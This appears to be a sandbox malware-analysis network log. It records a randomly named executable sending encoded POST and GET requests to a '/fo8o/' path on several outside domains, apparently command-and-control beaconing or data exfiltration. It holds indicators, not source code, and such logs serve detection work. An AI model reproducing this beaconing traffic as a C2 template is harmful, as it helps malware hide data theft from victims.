Aug 12, 2024 13:01:04.019870043 CEST	517	OUT	GET /fo8o/?wP=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8ssmc93kihOWHWb8NTA0vbQpCHGBmxgdm5sPEbG1Wvor0LSPPjnI=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.kasegitai.tokyo Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:01:04.628468037 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 11:01:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 30 64 33 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 70 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 09 3c 21 2d 2d 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20 2f 3e 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 39 5d 3e 0a 09 3c 73 74 [TRUNCATED] Data Ascii: 10d3<!doctype html><html lang="jp"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>403 Forbidden</title><link rel="stylesheet" type="text/css" href="/style.css">...<meta name="robots" content="noindex" />-->...[if gte IE 9]><style type="text/css">.gradient {filter: none;}</style><![endif]-->... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MLXKCD66');</script>... End Google Tag Manager --></head>...<body class="blackboard">--><body class="tokyo1">... Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.htm [TRUNCATED]
Aug 12, 2024 13:01:04.628504992 CEST	224	IN	Data Raw: 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 22 3e 3c 2f 69 66 72 61 6d 65 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 45 6e 64 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e Data Ascii: yle="display:none;visibility:hidden"></iframe></noscript>... End Google Tag Manager (noscript) --><a href="https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886" target="_blank" class="bnrLink
Aug 12, 2024 13:01:04.628622055 CEST	1236	IN	Data Raw: 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 6c 6f 72 66 75 6c 62 6f 78 2e 6a 70 2f 63 6f 6d 6d 6f 6e 2f 69 6d 67 2f 62 6e 72 2f 63 6f 6c 6f 72 66 75 6c 62 6f 78 5f 62 6e 72 30 31 2e 70 6e 67 22 20 61 6c 74 3d 22 Data Ascii: "><img src="https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png" alt=""></a><div class="invalid"><h1><img src="/img/img01.png" alt=""><p>403 Forbidden</p></h1>...<div><p class="txt01"> <span
Aug 12, 2024 13:01:04.629117012 CEST	1236	IN	Data Raw: 2e 70 6e 67 22 20 61 6c 74 3d 22 e3 83 a9 e3 83 83 e3 82 b3 4d 26 41 e3 82 92 e4 bd bf e3 81 a3 e3 81 a6 e3 81 bf e3 82 8b 22 3e 3c 2f 61 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 75 6c 20 63 6c 61 73 73 3d 22 61 74 74 65 6e 74 69 6f 6e 5f 6c 69 Data Ascii: .png" alt="M&A"></a></div><ul class="attention_list"><li><span>M&A</span></li><li><span></span></li></u
Aug 12, 2024 13:01:04.629133940 CEST	569	IN	Data Raw: 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e Data Ascii: ticsObject']=r;i[r]=i[r]\|\|function(){ (i[r].q=i[r].q\|\|[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.googl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	54836	116.50.37.244	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:10.020818949 CEST	802	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 4f 7a 42 6a 36 4a 36 37 6b 76 66 53 54 37 30 43 57 78 57 66 67 72 67 58 30 55 65 42 5a 37 65 4f 56 45 76 6b 57 45 76 75 30 41 64 Data Ascii: wP=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
Aug 12, 2024 13:01:10.893358946 CEST	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 12 Aug 2024 11:01:10 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	54837	116.50.37.244	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:12.549856901 CEST	826	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d Data Ascii: wP=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
Aug 12, 2024 13:01:13.423549891 CEST	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 12 Aug 2024 11:01:12 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	54838	116.50.37.244	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:15.079633951 CEST	1839	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.goldenjade-travel.com Origin: http://www.goldenjade-travel.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1243 Referer: http://www.goldenjade-travel.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 37 54 4a 49 36 4a [TRUNCATED] Data Ascii: wP=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xLxxZRBnnOm80ZPuFW25W83c/uztA8oIy6Zx51Q7Gk4SYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuWEOxQ2XgpVocxv2Ww+KM+3qaBoilY6tFBtgVVIxs3fk0QPXrah9pLST7AxXeLcpttDa6ueCHThUf4E7TJI6J0begpvdJJcJDMI7f9ZZvplcBtpJFkNRdcTUOp8UhyoQzN3uRn068E7b8T3fWdLG9xYgp1jaiB4QpVWhwWcgek2BPOP8VpQEsmp/aDoZQTnrp54Hp/Mz08dCnVpVz3UHzmev89AuG9CmN+dbrlVUt6LQQY6s3P8m0frWTXfkLTpcQVpCpvC0S/C+Ksq48VMlvhGhD56zinvfxhkCYTpVQzisTzii5ItAaAWzu7x2pD0AbLVYN4RZJo40N4oftACttlMTTbK/tkbduINwDrKC5GB1El2qE4KpU95OIfm4uqZGt2pOu77F0rioMP+LO43oShjrJy02G5PqBZhRSLFLg9JBha1JlR98tj/YPg9nYCHaYpZcse4vZQQuha+fUtHvDtsDkkAbaid5otVHEYxGOhPD/6OwgxWPuX3yyxek4UDhtumKvbvtYC552ZLFYKSsziJLU3oUdUuGszAt0tkWFwApTIJ+cHgNSqzRv6mL+TH8VAfBAkXPQnCgyvc81hxT5sdh8TkYQm6BCAWAVGAaVTkuED+LfGlGqaMnYmgC6CZZMRIBw+GzlpkVeSq5pdNiOCraYcno2YW+9rtBOGsQAqK39E/d8J3cb0Hn5SgLK4WxrOwZzu+uGTHJdDkNRUxsRIX8AVEa5YbRof3w1KR7N6TOVIylTxWyCx4 [TRUNCATED]
Aug 12, 2024 13:01:15.960552931 CEST	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 12 Aug 2024 11:01:15 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	54839	116.50.37.244	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:17.611202955 CEST	523	OUT	GET /fo8o/?wP=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=&fPh4U=MJo4 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.goldenjade-travel.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Aug 12, 2024 13:01:18.488327026 CEST	492	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Mon, 12 Aug 2024 11:01:17 GMT Connection: close Content-Length: 315 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	54842	85.159.66.93	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:32.191545010 CEST	781	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 207 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75 Data Ascii: wP=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	54843	85.159.66.93	80	5692	C:\Program Files (x86)\LlUCXAzFCRAWibJdXGLrLzqowrurxPqnXBhYLQggUbGyLufRaCueVBDUmRWpRM\eODCXMCnMwxOuMbj.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 13:01:34.933160067 CEST	805	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.magmadokum.com Origin: http://www.magmadokum.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 231 Referer: http://www.magmadokum.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 77 50 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d Data Ascii: 